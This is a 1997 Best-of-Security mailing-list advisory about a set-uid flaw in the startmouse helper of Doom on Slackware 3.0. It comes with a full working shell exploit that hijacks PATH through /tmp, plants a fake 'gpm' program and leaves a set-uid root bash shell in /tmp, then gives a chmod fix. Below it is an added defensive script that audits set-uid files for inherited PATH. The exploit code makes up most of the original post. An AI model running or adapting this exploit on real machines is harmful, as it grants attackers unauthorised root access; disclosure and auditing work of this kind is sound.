[49] in Best-of-Security


BoS: Security hole in Slack (startmouse - Doom) + exploit

daemon@ATHENA.MIT.EDU (Cristian VARVAS)
Thu Feb 27 07:32:15 1997

Date: Wed, 26 Feb 1997 12:04:05 +0200 (EET)
From: Cristian VARVAS <jolly@ana.utcluj.ro>
Cc: admin@utcluj.ro
In-Reply-To: <Pine.GSO.3.95.970222170637.18883A-100000@sundy.cs.pub.ro>
Reply-To: best-of-security@suburbia.net
Errors-To: best-of-security-request@suburbia.net
To: best-of-security@suburbia.net
Resent-From: best-of-security@suburbia.net

	I have found a security hole in startmouse on Doom (Slack 3.0).
	I made an exploit. My exploit works if you have
/usr/games/doom/startmouse with the suid flag set.

---begin

#!/bin/sh
export PATH=/tmp:$PATH
#			(c)1997 by jolly@utcluj.ro
#
echo '#include<stdio.h>                                         '>>/tmp/gpm.c
echo 'void main()                                               '>>/tmp/gpm.c
echo '{                                                         '>>/tmp/gpm.c
echo '   seteuid(0,0);                                          '>>/tmp/gpm.c
echo '   system("cp /bin/bash /tmp/setuid.bash");               '>>/tmp/gpm.c
echo '   system("chmod 4755 /tmp/setuid.bash");                 '>>/tmp/gpm.c
echo '}                                                         '>>/tmp/gpm.c
#
cc -o /tmp/gpm /tmp/gpm.c
/usr/bin/doom
rm /tmp/gpm.c /tmp/gpm
sleep 5
/tmp/setuid.bash

---end
	Solution: chmod 755 /usr/games/doom/startmouse

--------------------------------------------------------------
Technical University            Cristian VARVAS <cvarvas@utcluj.ro>
        of                      Str. M. Viteazu, Nr. 21, Ap. 50
   Cluj-Napoca                  RO 2400 SIBIU
Data Communication Center       tel +40(0)69-420418,fax 213901
--------------------------------------------------------------
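
The exploit above works by putting /tmp first in PATH and planting a file named gpm there, so it depends on a set-uid file resolving a helper through the caller's PATH. The following audit script is an added example, not part of the original post: it lists set-uid/set-gid files under a directory, flags interpreter scripts that never set their own PATH, and clears the bits in the same spirit as the post's chmod fix. The function names and the PATH-assignment heuristic are assumptions made for illustration.

```shell
#!/bin/sh
# Added example, not from the original post. Function names are hypothetical.

# list_suid DIR: print every regular file under DIR with set-uid or set-gid set.
list_suid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null
}

# is_script FILE: true if FILE starts with an interpreter line ("#!").
is_script() {
    [ "$(head -c 2 "$1" 2>/dev/null)" = '#!' ]
}

# sets_path FILE: true if the script assigns PATH itself.
# Heuristic only: looks for a PATH= assignment at the start of a line.
sets_path() {
    grep -Eq '^[[:space:]]*(export[[:space:]]+)?PATH=' "$1" 2>/dev/null
}

# audit_suid DIR: classify each set-uid/set-gid file under DIR.
#   SCRIPT-NO-PATH  interpreter script that inherits the caller's PATH
#   SCRIPT          interpreter script that sets its own PATH
#   BINARY          anything else (needs manual review)
audit_suid() {
    list_suid "$1" | while IFS= read -r f; do
        if is_script "$f"; then
            if sets_path "$f"; then
                echo "SCRIPT $f"
            else
                echo "SCRIPT-NO-PATH $f"
            fi
        else
            echo "BINARY $f"
        fi
    done
}

# strip_suid FILE: clear set-uid and set-gid, keeping the other mode bits
# (on a 4755 file this gives the same result as the post's "chmod 755").
strip_suid() {
    chmod u-s,g-s "$1"
}

# Stand-alone use: sh audit.sh /usr/games
if [ "$#" -gt 0 ]; then
    audit_suid "$1"
fi
```

A SCRIPT or BINARY result is not a clean bill of health; it only means this heuristic found no inherited-PATH script, and the file still needs review.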

